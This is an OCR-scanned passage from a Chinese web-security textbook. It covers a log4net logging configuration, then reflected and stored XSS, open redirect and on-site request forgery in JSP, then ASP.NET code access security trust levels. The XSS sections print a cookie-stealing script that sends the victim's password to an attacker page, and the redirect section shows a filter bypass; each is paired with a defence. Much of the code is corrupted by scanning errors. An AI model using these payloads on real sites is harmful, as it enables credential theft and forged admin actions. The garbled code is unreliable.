</layout> 
</parameter> 
<parameter> 
<parameterName value="@thread" /> 
<dbType value="String" /> 
<size value="255" /> 
<layout type="log4net.Layout.PatternLayout"> 
<conversionPattern value="%thread" /> 
</layout> 
</parameter> 
<parameter> 
<parameterName value="Q@log level" /> 
<dbType value="String" /> 
<size value="50" /> 
<layout type="log4net.Layout.PatternLayout"> 
<conversionPattern value="$level" /> 
</layout> 
</parameter> 
<parameter> 
<parameterName value="@logger" /> 
<dbType value="String" /> 
<size value="255" /> 
<layout type="log4net.Layout.PatternLayout"> 
<conversionPattern value="%$logger" /> 
</layout> 
</parameter> 
<parameter> 
<parameterName value="@message" /> 
<dbType value="String" /> 
<size Value="1024" /> 
<layout type="log4net.Layout.PatternLayout"> 
<conversionPattern Value="smessage"” /> 
</layout> 
</parameter> 
</appender> 
<! 一 -定义 日 志 的 输出 媒介 , 下面 定 义 日 志 以 四 种 方式 输出 , 也 可 以 按照 一 种 类 型 或 其 他 类 
型 输出 --> 
<root> 
<appender-ref ref="LogFileAppender" /> 
<appender-ref ref="ConsoleAppender" /> 
<appender-ref ref="EventLogAppender" /> 
<appender-ref ref="AdoNetAppender Access" /> 
</root> 
</log4net> 
</configuration> 


接 下 来 , 要 在 需要 记录 日 志 的 代码 中 调用 该 日 志 组 件 , 这 里 以 LoggingExample 代码 为 
例 ， 介 绍 启动 记录 功能 。 














= 
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实例 中 直接 启动 组 件 ， 执 行 Error 和 Fatal 级 别 的 日 志 记录 方法 ， 代 码 如 下 : 


LoggingExample.cs 
// Configure log4net using the .config file 
[assembly: log4net.Config.XmlConfigurator (Watch=true) ] 
// log4net+ 组 件 将 获取 配置 文件 
// 名 为 Console App.exe.config 的 文件 将 生成 到 应 用 程序 的 根 目录 


namespace ConsoleApp 
{ 
using System; 
/**//// <summary> 
/// Example of how to simply configure and use log4net 
/// </summary> 
public class LoggingExample 


{ 
private static readonly log4net.ILog 1og = 


log4net .LogManager .GetLogger (System.Reflection.MethodBase.GetCurrentMet 
hod() .DeclaringType); 


public static void Main(string[] args) 
由 
log.Error ("Error Acc"); 
log.Fatal ("Fatle Acc"); 
System.Console.ReadLine (); 


日 志 组 件 启动 后 的 结果 记录 如 下 


[Header] 

2011-1-14 17:14:18,458ate [4100hread] 

Log4Net .Forml .btnTest Click(C:\Users\John\Documents\Visual Studio 
2011\Projects\Project1\Log4Net\Log4Net\Forml .cs:24)evel 

Log4Net .Forml .btnTest Click(C:\Users\John\Documents\Visual Studio 
2011\Projects\Project1\Log4Net\Log4Net\Forml .cs:24)ogger [dc] - Error Acc 


ls 
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本 章 从 实际 的 JSP 例子 出 发 ， 解 释 钓 鱼网 站 问题 产生 的 原因 。 这 些 例子 代码 是 很 多 
Web 开发 人 员 在 开始 学 习 时 编写 的 问题 代码 。 代 码 看 起 来 并 没有 什么 问题 ， 但 是 往往 存在 
巨大 的 漏洞 。 下 面 将 用 几 个 例子 ， 分 别 讲述 4 种 Web 钓鱼 网 站 的 攻击 手段 及 原理 ， 以 及 
程序 员 需 要 从 哪些 方面 进行 防御 。 

口 反射 型 XSS 漏洞 ; 

口 保存 型 XSS 漏洞 ; 

口 重 定向 漏洞 ; 

口 本 站 点 请 求 漏洞 。 

下 面 以 JSP/Servlet 技术 为 例 ， 但 是 漏洞 和 解决 方法 的 原理 适用 于 其 他 Web 技术 。 


12.1 反射 型 XSS 漏洞 


反射 型 XSS 漏洞 是 一 种 非常 常见 的 Web 漏洞 ， 原 因 是 由 于 程序 动态 显示 用 户 提交 
的 内 容 ， 而 没有 对 显示 的 内 容 进行 验证 限制 。 因 此 这 就 让 攻击 者 可 以 将 内 容 设计 为 一 种 攻 
击 脚本 ， 并 且 引 诱 受害 者 将 此 攻击 脚本 作为 内 容 显示 ， 而 实际 上 攻击 脚本 在 受害 者 打开 时 
就 开始 执行 ， 以 此 盗用 受害 者 信息 。 

例子 的 功能 是 动态 显示 错误 信息 的 程序 ， 错 误 信 息 可 以 在 URL 中 传递 ， 显 示 时 服务 
器 不 加 任何 限制 ， 符 合 反射 型 XSS 攻击 的 条 件 。 

index.jsp 作为 用 户 登 录 界面 , 提交 登录 请 求 给 ReflectXSSServe.java。 ReflectXSSServe. 
java 处 理 登 录 请 求 ， 将 用 户 名 和 密码 记录 到 Cookie， 方 便 用 户 下 次 登录 。 如 果 登 录 信 息 错 
误 (代码 直接 认为 错误 ), 就 会 跳 转 到 errorjsp, 显示 错误 信息 , 错误 信息 是 通过 名 为 error 
的 参数 传递 。 下 面 列 出 3 个 文件 的 主要 代码 。 

首页 index.jsp 主要 代码 : 

<form action="ReflectXSSServer" method="post"> 

用 户 名 : <input type="text" name="username" value=""/><br> 

密 gnbsp; 个: <input type="password" name="password" value=""/><br> 


<input type="submit" value=" 提 交 "/> 
</form> 








反射 处 理 页 ReflectXSSServe.java 主要 代码 : 


String username = request.getParameter ("username"); 
String password = request.getParameter ("password"); 
// 添加 用 户 信息 到 Cookie, 方便 下 次 自动 登录 

addToCookie ("username", username); 

addToCookie ("password", password); 

request .getRedquestDispatcher (" 
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error.jsp?error=password is wrong!").forward(request, response); 


错误 页 errorjsp 主要 代码 : 


Error Message :<%=request .getParameter ("error")%®> 


上 述 代 码 貌 似 没有 问题 ， 似 乎 也 很 合 逻 辑 ， 但 是 这 个 程序 暴露 出 一 个 严重 的 问题 就 是 
错误 信息 是 通过 参数 传递 ， 并 且 没 有 经 过 任何 处 理 就 显示 。 如 果 被 攻击 者 知道 存在 这 样 一 
个 errorjsp， 攻 击 者 就 可 以 很 容易 的 攻击 用 户 并 且 获 得 用 户 的 重要 信息 。 

漏洞 分 析 。 假 设 网 站 的 链接 URL 如 下 所 示 : 


http://localhost:8080/application/error.jsp?error=<script>var mess = 
document .Cookie .match (new%20RegExp ("password=([~^;]*)")) [0]; 
window.location="http://localhost:8080/attacter/index.jsp?info="%2Bmess 
</script> 








对 于 这 样 一 个 URL, 需要 分 隔 进 行 分 析 。http://localhost:8080/application/error.jsp?error= 
这 一 部 分 , 是 errorjsp 的 地 址 , 读者 需要 关心 后 面 的 错误 信息 内 容 , 这 是 一 段 JavaScript 脚 
本 。document.Cookie.match(new%20RegExp("password=([^;]*)")[0], 是 为 了 获得 Cookie 中 
名 为 password 的 值 。 

然后 , 通过 window.location 重 定向 到 攻击 者 的 网 站 , 并 且 把 password 作为 参数 传递 
过 去 , 这 样 , 攻击 者 就 知道 你 的 密码 了 。 后 面 , 只 需要 让 被 攻击 者 登录 后 点 击 这 个 URL 就 
可 以 了 。 

如 图 12-1 所 示 为 让 被 攻击 者 可 以 单 击 这 个 URL， 攻 击 者 往往 会 构建 能 够 吸引 被 攻击 
者 的 网 页 或 邮件 。 这 个 做 法 有 个 形象 的 称呼 : 钓鱼 攻击 。 当 被 攻击 者 登录 应 用 系统 后 , Cookie 
就 保存 了 用 户 名 和 密码 信息 。 由 于 设计 的 URL 的 主体 是 受信 任 的 网 站 ， 被 攻击 者 往往 毫 
不 犹豫 地 单 击 攻击 者 设计 的 URL， 那 么 设计 好 的 script 脚本 被 当做 信息 内 容 杠 入 到 
error.jsp 中 时 ， 就 会 作为 脚本 开始 执行 ， 用 户 名 和 密码 也 就 被 人 盗 取 了 。 


3 ac- 


加 天 让 htpy/ocalhosts080/application/indexjsp 








图 12-1 用 户 登 录 界 面 








用 户 输入 用 户 名 和 密码 分 别 为 user 和 pass， 登 录 后 受到 钓鱼 攻击 ， 单 击 攻击 者 设计 
的 URL。 当 使 用 户 点 击 URL， 攻 击 者 设计 的 URL 包含 攻击 脚本 ， 攻 击 脚本 执行 后 ， 
password 的 内 容 被 传 到 另 一 个 网 站 , 这 个 应 用 程序 是 attacter( 附 件 中 也 会 包含 ), password 
信息 被 记录 到 攻击 者 的 数据 库 。 如 图 12-2 所 示 ，HTTP 地 址 就 表示 用 户 的 账户 信息 已 经 被 
记录 到 黑客 的 指定 网 站 。 














http: /aocalhost:8080/attacterfindex. jsp?info=password-pass Yi 区 分 











图 12-2 攻击 成 功 界面 
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所 以 需要 尽量 避免 直接 显示 用 户 提交 的 数据 ， 应 进行 一 定 的 过 滤 ， 如 对 于 数据 中 存在 





的 < 和 > 等 符号 需要 进行 编码 ， 这 样 就 可 以 防止 脚本 攻击 。 


12.2 保存 型 XSS 漏洞 


保存 型 XSS 漏洞 的 危害 会 更 大 ,是 将 攻击 脚本 保存 到 被 攻击 的 网 页 内 ,所 有 浏览 该 网 


页 的 用 户 都 要 执行 这 段 攻击 脚本 。 


下 面 实例 模仿 了 一 个 论坛 发 表 评论 的 网 页 。 对 于 用 户 的 评论 ， 系 统 不 加 任何 限制 和 验 
直接 保存 到 服务 器 的 数据 库 中 《例子 中 使 用 全 局 变量 模拟 数据 库 插入 操作 ) ， 并 且 当 


其 他 用 户 查 看 网 页 时 显示 所 有 评论 ， 如 图 12-3 所 示 。 


中 
显 





[http://1ocalhost:8080/ application/ saveXSS. jsp ~ 











helloworld 


评论 ，|<sckipt>var mess = do 


图 12-3 评论 界面 


评论 页 saveXSS.jsp 主要 代码 如 下 : 


<jsp:useBean id="tl" scope="application" class="java.util.LinkedList"> 
</jsp:useBean> 

< 多 

String topic = (String) request.getParameter ("topic"); 

if (topic != null && !topic.equals("")) 


{ 

tl.add (topic) 7 

} 

> 

<div> 

<% for (Object obj : tl1) 

{ 

String str = (String)obj; 

$>: 

<div><%=str%><div/> 

< 

</div> 

<form action="saveXSS.jsp" method="post"> 
评论 : <input type="text" name="topic"/><br> 
<input type="submit" value=" 提 交 "/> 
</form> 


这 里 用 了 一 个 应 用 级 的 List 对 象 存放 评论 列表 ， 只 是 为 了 演示 方便 。 用 户 可 以 在 form 








编写 评论 内 容 ， 提 交 到 同一 页 面 saveXSS.jsp， 提 交 以 后 ，List 对 象 增加 这 个 评论 ， 并 且 
示 出 来 。 





1. 问题 分 析 
这 个 程序 符合 了 保存 型 XSS 攻击 的 所 有 条 件 ， 没 有 限制 评论 内 容 ， 程 序 会 保存 所 有 
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评论 ， 显 示 给 查看 网 页 的 用 户 。 只 要 攻击 者 将 攻击 脚本 作为 评论 内 容 ， 那 么 所 有 查看 评论 
的 用 户 都 将 执行 这 段 攻击 脚本 而 受到 攻击 。 


2. 攻击 此 程序 


攻击 这 个 程序 所 需要 设计 的 攻击 脚本 和 上 文 的 错误 显示 内 容 一 样 ， 但 是 需要 注意 的 是 
这 次 不 需要 编码 , %20 改 为 空格 , 而 %2B 则 变 为 +, 原因 是 上 例 是 通过 URL 传递 数据 ， 
而 本 例 是 直接 通过 表单 传递 数据 , 攻击 脚本 : <script>var mess = document.Cookie.match(new 
RegExp("password=([^;]*)"))[0]; window.location="http://localhost:8080/attacter/index.jsp? info= 
"+mess</script>， 将 这 个 内 容 作 为 评论 发 表 ， 那 么 当 其 他 用 户 查看 这 个 网 页 时 ， 攻 击 脚 本 
代码 被 当做 内 容 嵌 入 到 网 页 中 ， 攻 击 脚本 就 被 触发 执行 ， 用 户 就 会 受到 攻击 ， 脚 本 执行 过 
程 和 反射 型 XSS 攻击 一 致 。 

发 表 的 内 容 是 攻击 者 设计 的 一 个 攻击 脚本 ， 这 个 脚本 被 直接 保存 到 了 网 页 中 。 任 何 查 
看 此 页 面 的 其 他 用 户 ， 他 们 的 信息 都 会 被 盗 取 。 


3. 解决 方法 


对 于 保存 型 XSS 漏洞 , 由 于 无 可 避免 的 需要 显示 用 户 提交 的 数据 ,所 以 过 滤 是 必然 的 ， 
过 滤 < 和 > 等 符号 可 以 避免 上 述 漏洞 的 发 生 。 





12.3 重 定 向 漏洞 


如 果 应 用 程序 提取 用 户 可 控制 的 输入 ， 并 使 用 这 个 数据 执行 一 个 重 定向 ， 指 示 用 户 的 
浏览 器 访问 一 个 不 同 于 用 户 要 求 的 URL， 那 么 就 会 造成 重 定向 漏洞 。 
例子 允许 用 户 输入 一 个 重 定向 路 径 ， 由 服务 器 执行 跳 转 。 
提交 页 index.jsp 主要 代码 如 下 : 
<form action="Redirect"> 
地 址 : <input name="target" type="text"><br> 


<input type="submit"” value=" 提 交 "> 
</form> 


重 定向 页 Redirectjava 主要 代码 如 下 : 


String param = request.getParameter ("target"); 
if (param != null && !param.equals("")) 
response.sendRedirect (param); 


| 














和 户 在 indexjsp 的 表单 中 输入 跳 转 的 路 径 ， 服 务 器 端的 Redirectjava 执行 
sendRedirect 重 定向 。 


1. 问题 分 析 


程序 允许 设置 重 定向 地 址 ， 而 并 没 对 地 址 内 容 进 行 验证 处 理 ， 而 是 直接 跳 转 ， 那 么 攻 
者 完全 可 以 设计 一 个 攻击 URL,， 其 中 包含 攻击 者 设计 的 攻击 内 容 ， 使 用 钓鱼 攻击 ， 诱 使 
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用 户 点 击 此 URL， 受 到 攻击 。 

2. 攻击 此 程序 

设计 URL: http://www.test.com， 这 里 只 是 以 跳 转 作 为 例子 ， 并 没有 构建 真正 有 害 的 网 
站 ， 所 以 使 用 普通 地 址 作为 演示 ,假设 这 个 地 址 有 许多 有 害 信 息 。 其 中 http:// 头 部 非常 重 
要 ， 它 可 以 让 服务 器 执行 绝对 跳 转 ， 跳 转 到 www.test.com。 如 果 没 有 http:// 就 会 跳 转 到 
系统 的 相对 路 径 。 运行 效 果 如 图 12-4 所 示 ， 当 用 户 点 击 提交 ， 网 页 就 会 跳 转 到 测试 界面 。 
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图 12-4 输入 路 径 


有 人 试图 这 样 处 理 跳 转 路 径 param: param = param .replaceFirst("http:/", ""); 将 第 一 个 
“http:/ ”替换 为 空 字符 串 ， 认 为 这 样 可 以 解决 问题 。 但 是 , 攻击 者 往往 也 很 聪明 , 会 将 URL 
改 为 “: http:/http:/,” 即 使 替换 了 第 一 个 ， 第 二 天 http:// 就 会 生效 。 那 么 如 果 对 param 这 
么 处 理 呢 : param = param replaceAll("http:/", "9); 将 所 有 的 http:// 都 替换 ， 那 么 攻击 者 可 
以 将 URL 设计 为 hthttp://tp://, 将 中 间 的 http:// 替换 为 空 后 , ht 和 tp:// 组 合 又 变 为 http://， 
攻击 又 一 次 生效 。 因 此 ， 需 要 一 个 更 加 全 面 的 考虑 。 


3， 解决 方法 


避免 由 用 户 决定 跳 转 的 页 面 ， 如 果 必 须 这 么 做 ， 路 径 中 只 允许 出 现 /以 及 数字 或 者 英文 
字符 可 以 一 定 程度 的 避免 这 个 问题 。 


12.4 本 站 点 请 求 漏洞 


本 站 点 请 求 伪 造 (On-site Request Forgery，OSRF ) 是 一 种 利用 保存 型 XSS 漏洞 的 常 
见 攻击 有 效 载荷 。 是 攻击 者 设计 攻击 代码 ， 保 存 到 被 攻击 网 页 上 ， 当 普通 用 户 或 管理 员 查 
看 页 面 时 ， 攻 击 代码 就 会 执行 ， 此 攻击 代码 的 目的 是 伪装 成 查看 网 页 的 用 户 向 服务 器 发 出 
请 求 。 

这 是 一 个 发 布 图 像 的 论坛 例子 ， 用 户 可 以 输入 图 像 URL， 论 坛 负责 读 取 此 URL 进 
了 显示 。 

img:jsp 与 前 文 的 saveXSS.jsp 代码 相同 ， 只 是 这 次 显示 不 再 是 字符 串 ， 而 是 需要 将 
<div><%=str%><div/> 改 为 <div><img src=<%=str%> width=50 height=50/><div/>, 目的 是 
显示 用 户 上 传 的 图 像 。 

管理 员 查 看 页 adminjsp 主要 代码 如 下 : 

< 


String username = (String)request.getParameter ("username"); 
System.out.println("delete " + username); 


a 
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$> 

<$=username%®> 

admin.jsp 是 管理 员 用 于 删除 用 户 的 请 求 处 理 程序 ，adminjsp 实际 上 应 该 会 判断 是 否 
是 管理 员 账 户 , 如 果 是 才 允 许 执 行 删除 用 户 的 操作 。 本 文 例子 假设 请 求 的 确 为 管理 员 发 出 。 


1. 问题 分 析 


这 个 程序 明显 存在 着 保存 型 XSS 漏洞 , 并 且 上 传 的 内 容 被 作为 图 像 URL, img 标签 
是 本 站 点 请 求 漏洞 的 敲 门 器 , 因为 img 始终 会 执行 src 属性 的 URL 请 求 , 而 不 管 src 指 
向 的 是 否 是 真正 的 图 像 。 这 个 程序 并 没有 对 src 是 否 是 图 片 地 址 进行 验证 ， 因 此 可 以 伪造 
请 求 。 

2. 攻击 此 程序 


将 上 传 的 图 像 URL 设计 为 adminjsp? username=hello， 提 交 上 去 后 ， 从 攻击 者 的 角度 
看 , 只 是 图 片 没有 显示 ， 因 为 攻击 者 并 不 是 管理 员 ,， 所 以 实际 上 无 法 删除 hello 这 个 用 户 。 

但 是 当 管理 员 打 开 这 个 页 面 时 ，img 标签 就 会 执行 admin.jsp? username=hello 的 请 
求 ， 请 求 删除 hello 用 户 ， 由 于 的 确 是 管理 员 发 出 的 请 求 ， 服 务 器 执行 删除 操作 ， 删 除了 
hello 用 户 ， 攻 击 者 的 目的 也 就 达到 了 ， 如 图 12-5 和 图 12-6 所 示 。 






































http://localhost:8080/application/ime. jsp 








三 a 





图 片 地 址 ，|adnin. jsp? username=h| 





图 12-5 攻击 者 输入 URL 





application/ime. ]sp 























图 12-6 提交 URL 
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第 13 章 程序 间 的 访问 策略 


程序 间 的 访问 策略 是 代码 信任 技术 ， 是 一 种 资源 约束 模型 ， 管 理 员 可 以 使 用 它 来 确定 
特定 代码 如 何 访问 指定 的 资源 并 执行 其 他 特权 操作 。 本 章 的 重点 放 在 ASP.NET 代码 的 访 
问安 全 配置 上 , 通过 实例 说 明 如 何 克 服 开发 可 信任 的 Web 应 用 程序 时 可 能 遇 到 的 一 些 主要 
障碍 , 详细 阐述 代码 访问 安全 的 实现 要 素 。 读 者 将 学 会 如 何 开发 中 度 信任 的 Web 应 用 程序 。 


13.1 代码 信任 技术 概述 


传统 的 基于 用 户 的 安全 (如 操作 系统 提供 的 安全 ) 需要 根据 用 户 标识 对 各 种 资源 的 访 
问 进 行 授权 。 

在 Microsoft .NET 框架 的 3.0 以 上 版 本 中 ， 管 理 员 可 以 为 ASP.NET Web 应 用 程序 和 
Web 服务 (可 以 由 多 个 程序 集 组 成 ) 配置 策略 ， 而 且 它 们 还 可 授予 代码 访问 安全 权限 ， 允 
许 应 用 程序 访问 特定 的 资源 类 型 ， 执 行 特 定 的 特权 操作 。 

例如 ， 管 理 员 可 能 不 对 从 Intemet 下 载 的 代码 授予 访问 任何 资源 的 权限 ， 而 某 个 特定 
公司 开发 的 Web 应 用 程序 代码 应 该 获得 更 高 的 信任 度 。 例 如， 允许 访问 文件 系统 、 事 件 日 
志和 Microsoft SQL Server 数据 库 。 

糟糕 的 是 , 本 地 管理 员 启 动 的 程序 在 本 机 上 是 没有 限制 的 。 如 果 管 理 员 的 标识 被 哄骗 ， 
恶意 用 户 就 可 以 使 用 管理 员 的 安全 上 下 文 执行 代码 ， 那 么 对 恶意 用 户 同样 没有 限制 。 


全 注意 ; 使 用 NET 框架 2.0 以 下 版 本 构建 的 Web 应 用 程序 和 Web 服务 总 是 以 无 限 的 代码 
访问 权限 运行 的 ， 不 必 进 行 配置 。 


13.2 资源 访问 安全 


所 有 来 自 ASP.NET 应 用 程序 和 托管 代码 的 资源 访问 一 般 要 受 以 下 两 个 安全 层次 的 
限制 : 

1 代码 访问 安全 层 

代码 访问 安全 层 验 证 当前 调用 堆栈 中 的 所 有 代码 〈 一 直 引 向 并 包括 资源 访问 代码 ) 是 
和 否 已 经 得 到 访问 资源 的 授权 ， 管 理 员 可 以 使 用 代码 访问 安全 策略 将 权限 授予 程序 集 。 权 限 
确定 了 程序 集 可 以 访问 哪些 资源 类 型 ， 这 些 类 型 包含 文件 系统 、 注 册 表 、 事 件 日 志 、 目 录 
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服务 、Microsoft SQL Server 相关 文件 、OLE DB 数据 源 和 网 络 资源 。 
2. 操作 系统 /平台 安全 层 


操作 系统 /平台 安全 层 将 验证 请 求 方 线程 的 安全 上 下 文 是 否 可 以 访问 资源 。 如 果 线程 正 
在 模拟 ， 则 使 用 线程 模拟 标记 ;否则 使 用 进程 标记 并 与 同 资源 相关 联 的 访问 控制 列表 
(Access Controlling List，ACL) 进行 比较 ， 以 确定 所 请 求 的 操作 是 否 可 以 执行 ， 所 请 求 的 
资源 是 否 可 以 访问 。 

资源 如 果 要 成 功 地 进行 访问 , 必须 通过 以 上 两 种 检查 。.NET 框架 公开 的 所 有 资源 类 型 
都 是 用 代码 访问 权限 保护 的 。 图 13-1 所 示 为 Web 应 用 程序 访问 的 一 组 常见 的 资源 类 型 ， 
以 及 访问 成 功 必需 的 相关 代码 访问 权限 。 
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非 托管 代码 


图 13-1 ASP.NET Web 权限 关系 


13.3 ”完全 信任 和 部 分 信任 


默认 时 ，Web 应 用 程序 以 完全 信任 方式 运行 。 完 全 信任 的 应 用 程序 将 被 代码 访问 安全 
策略 授予 无 限 的 代码 访问 权限 ， 这 些 权限 包括 内 置 的 系统 权限 和 自 定义 权限 。 这 意味 着 代 
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无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 


码 访问 安全 将 不 会 阻止 应 用 程序 访问 任何 得 到 保护 的 资源 类 型 ， 资 源 访问 的 成 败 完全 取决 
于 操作 系统 级 安全 。 

完全 信任 运行 的 Web 应 用 程序 包括 所 有 用 .NET 框架 2.0 以 上 版 本 构建 的 ASPNET 应 
用 程序 。 默 认 .NET 框架 2.0 以 下 版 应 用 程序 是 以 完全 信任 运行 的 ， 信 任 级 可 以 配置 为 使 用 
<trust> 元 素 ， 这 一 点 在 本 章 后 面 进行 讲述 。 

如 果 一 个 应 用 程序 被 配置 为 Full 之 外 的 某 个 信任 级 ， 就 称 它 为 部 分 信任 应 用 程序 。 部 
分 信任 应 用 程序 的 权限 是 受 限 的 ， 该 权限 将 限制 访问 受 保护 资源 的 能 力 。 


























13.4 代码 访问 安全 配置 


Web 应 用 程序 默认 以 完全 信任 运行 ， 具 有 所 有 权限 。 在 ASP.NET 中 要 修改 代码 访问 
安全 的 信任 级 ， 必 须 在 machine.config 或 web.config 中 设置 一 个 开关 ， 将 应 用 程序 配置 为 
部 分 信任 级 别 。 


1. 配置 信任 级 


machine.config 中 的 <trust> 元 素 控制 是 否 为 Web 应 用 程序 启用 代码 访问 安全 。 打 开 
Imachine.config， 搜 索 “”， 可 以 参看 如 下 代码 : 

<system.web> 

<!-- level="[Full|lHigh|Medium|Low|Minimal]" --> 
<trust level="Full" originUrl=""/> 

</system.web> 

当 信 任 级 设置 为 Full 时 ， 将 禁用 代码 访问 安全 ， 因 为 权限 要 求 并 不 阻止 访问 资源 的 尝 
试 。 这 是 .NET 框架 构建 ASP.NET Web 应 用 程序 的 唯一 选择 。 从 Full 到 Minimal， 每 个 级 
别 都 会 删 去 一 些 权限 ， 限 制 应 用 程序 访问 受 保护 资源 和 执行 特权 操作 的 能 力 ， 每 个 级 别 都 
提供 了 更 大 程度 的 应 用 程序 独立 性 。 表 13-1 所 示 为 预定 义 的 各 个 信任 级 ， 并 指出 了 每 个 信 
任 级 与 前 一 级 别 相 比较 的 主要 限制 。 

表 13-1 信任 级 所 施加 的 限制 
主要 限制 

所 有 权限 应 用 程序 可 以 访问 任何 受 操作 系统 安全 限制 的 资源 ， 支 持 所 有 的 特权 操作 
不 能 调用 非 托管 代码 ; 
不 能 调用 服务 组 件 ; 
不 能 写 事件 日 志 ; 
不 能 访问 Microsoft 消息 队列 ; 
不 能 访问 OLE DB 数据 源 
除 上 述 限 制 之 外 ， 文 件 访问 仅 限于 当前 应 用 程序 目录 ， 不 允许 访问 注册 表 
除 上 述 限制 之 外 ， 应 用 程序 不 能 连接 SQL Server， 代 码 无 法 调用 CodeAccessPermission. 
Assert〈 即 不 能 监测 安全 权限 ) 
只 有 执行 权限 


信任 级 
Full 

















High 








Medium 


Low 





Minimal 
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2. 锁定 信任 级 





如 果 Web 服务 器 管理 员 想 使 用 代码 访问 安全 来 确保 应 用 程序 的 独立 性 , 并 限制 对 系统 
级 资源 的 访问 ， 就 必须 在 计算 机 上 定义 安全 策略 ， 防 止 应 用 程序 将 其 改写 。 

应 用 程序 服务 提供 商 或 者 负责 在 同一 服务 器 上 运行 多 个 Web 应 用 程序 的 任何 人 , 应 该 
锁定 所 有 Web 应 用 程序 的 信任 级 ,即将 Machine.config 中 的 <trus 作 元素 加 入 <location> 标 记 ， 
并 将 allowOverride 属性 设置 为 false， 代 码 如 下 所 示 : 

<location allowOverride="false"> 

<system.web> 


<!-- level="[Full|lHigh|Medium|lLow|Minimal]" --> 
<trust level="Medium" originUrl=""/> 
</system.web> 
</location> 








13.5 ASP.NET 策略 文件 


每 个 信任 级 都 与 一 个 XML 策略 文件 对 应 ， 策 略 文件 列 出 了 每 个 信任 级 授予 的 权限 集 。 
策略 文件 位 于 以 下 目录 


gwindirsMicrosoft .NETEFramework{fversion}CONFIG 


信任 级 通过 Machine.config 中 的 <trustLevel> 元 素 与 策略 文件 进行 对 应 ， 这 些 元 素 位 于 
<trust> 元 素 之 中 ， 代 码 如 下 所 示 ; 


<location allowOverride="true"> 
<system.web> 
<securityPolicy> 
<trustLevel name="Full" policyFile="internal"/> 
<trustLevel name="High" policyFile="web hightrust.config"/> 
<trustLevel name="Medium" policyFile="web mediumtrust.config"/> 
<trustLevel name="Low" policyFile="web lowtrust.config"/> 


<trustLevel name="Minimal" policyFile="web minimaltrust.config"/> 
</securityPolicy> 


<!-- level="[Full|lHigh|lMedium|lLow|Minimal]" --> 
<trust level="Full" originUrl=""/> 
</system.web> 
</location> 


全 注意 : 完全 信任 级 没有 对 应 的 策略 文件 . 这 是 一 个 特例 , 表示 所 有 权限 的 无 限 集 . ASP.NET 
策略 是 可 完全 配置 的 。 除 了 默认 的 策略 文件 之 外 ,管理 员 可 以 创建 自 定义 权 限 文件 ， 
并 使 用 <trust> 元 素 对 其 进行 配置 ， 这 一 点 将 在 本 章 的 后 面 进行 叙述 。 与 自 定 义 级 别 
相关 的 策略 文件 必须 用 Machine.config 中 的 <trustLevel> 元 素 进行 定义 。 


13.6 ASPNET 安全 策略 


代码 访问 安全 策略 是 层次 化 的 ， 可 以 在 多 个 级 别 上 进行 管理 。 可 以 为 企业 级 、 机 器 级 、 


.243 。 





无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 


用 户 级 和 应 用 程序 级 创建 策略 。ASP.NET 代码 访问 安全 策略 是 应 用 程序 级 策略 的 实例 。 
XML 配置 文件 中 为 每 个 级 都 定义 了 策略 。 企 业 级 、 机 器 级 和 用 户 级 策略 可 以 用 
MicrosoftNET 框架 的 配置 工具 进行 配置 ， 但 是 ASP.NET 策略 文件 必须 使 用 
或 文本 编辑 器 手工 进行 编辑 。 
ASP.NET 信任 级 策略 文件 指出 哪些 权限 可 以 被 授予 某 个 特定 信任 级 配置 的 应 用 程序 。 
授予 ASPNET 应 用 程序 的 实际 权限 是 由 所 有 策略 级 (包括 企业 级 、 机 器 级 、 用 户 级 和 
ASPNET 应 用 程序 域 级 策略 ) 授予 的 权限 交集 确定 的 。 


策略 和 











4 层次 是 从 企业 级 向 下 计算 到 ASP.NET 应 用 程序 级 的 ， 权 限 的 范 


如 果 没 有 更 高 的 级 别 首先 授予 权限 ， 就 无 法 在 ASPNET 应 用 程序 级 添加 权 
确保 了 企业 级 管理 员 始 终 具有 最 终 决 定 权 ， 在 应 用 程序 域 中 运行 的 恶意 代码 无 法 请 求 比 管 
理 员 配 置 权限 更 多 的 权限 。 
1. ASP.NET 策 略 文件 
为 了 了 解 某 个 特定 的 信任 级 定义 的 权限 ， 可 以 在 记事 本 或 者 XML 编辑 器 中 打开 相应 
的 策略 文件 ， 找 到 ASPNET 命名 权限 集 。 此 权限 集 列 出 了 为 当前 信任 级 的 应 用 程序 配置 





的 权限 。 


XML 编辑 器 











围 不 断 缩 小 。 





限 。 这 种 方式 


各 注意 : FullTrust 和 Nothing 权限 集中 不 包含 权限 元 素 ， 因 为 FullTrust 意味 着 所 有 权限 ， 
而 “Nothing” 意 味 着 不 包含 权限 。 


以 下 


尺码 片段 显示 了 一 个 ASP.NET 策略 文件 的 主要 元 素 : 


<configuration> 
<mscorlib> 


<security> 
<policy> 
<PolicyLevel version="1"> 
<SecurityClasses> 


. list of security classes, permission types, 


and code group types ... 
</SecurityClasses> 
<NamedPermissionSets> 
<PermissionSet Name="FullTrust" ... /> 
<PermissionSet Name="Nothing" .../> 
<PermissionSet Name="ASP.NET" ... 
. This is the interesting part ... 
. List of individual permissions... 
<IPermission 
class="AspNetHostingPermission 
version="1" 
Level="High" /> 
<IPermission 
class="DnsPermission" 
Version="1" 
Unrestricted="true" /> 
...Continued list of permissions... 
</PermissionSet> 
</PolicyLevel version="1"> 
</policy> 
</security> 


</mscorlib> 
</configuration> 
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上 述 的 <IPermission> 元 素 定义 了 权限 类 型 名 、 版 本 和 是 否 处 于 无 限 状态 。 
2. 权限 状态 和 无 限 权 限 


许多 权限 都 包含 状态 ， 状 态 可 以 用 于 微调 指定 的 访问 权限 ， 准 确 地 确定 允许 应 用 程序 
的 行为 。 例 如 ，FileIOPermission 可 以 指定 一 个 目录 和 一 个 访问 类 型 ( 读 取 、 写 等 ) 。 以 下 
代码 演示 呼叫 代码 被 授予 访问 C:SomeDir 目录 的 读 取 权 限 : 


(new FileIOPermission (FileIOPermissionAccess.Read, @"C:SomeDir")) .Demand () 


如 果 处 于 无 限 状态 时 , FileIOPermission 允许 对 文件 系统 的 任何 区 域 进 行 任何 类 型 的 访 
问 (当然 , 操作 系统 安全 仍然 适用 ) 。 以 下 代码 演示 呼叫 代码 被 授予 无 限 的 FileIOPermission 
访问 权限 : 


(new FileIOPermission (PermissionState.Unrestricted)) .Demand() 


3. ASP.NET 命 名 权限 集 


ASP.NET 策略 文件 包含 一 个 ASP.NET 命名 权限 集 。 该 权限 集 定义 了 应 用 程序 域 策 略 
授予 相关 应 用 程序 的 权限 。 

ASP.NET 策略 还 引入 了 一 个 自 定 义 的 AspNetHostingPermission, 包括 与 默认 级 别 之 一 
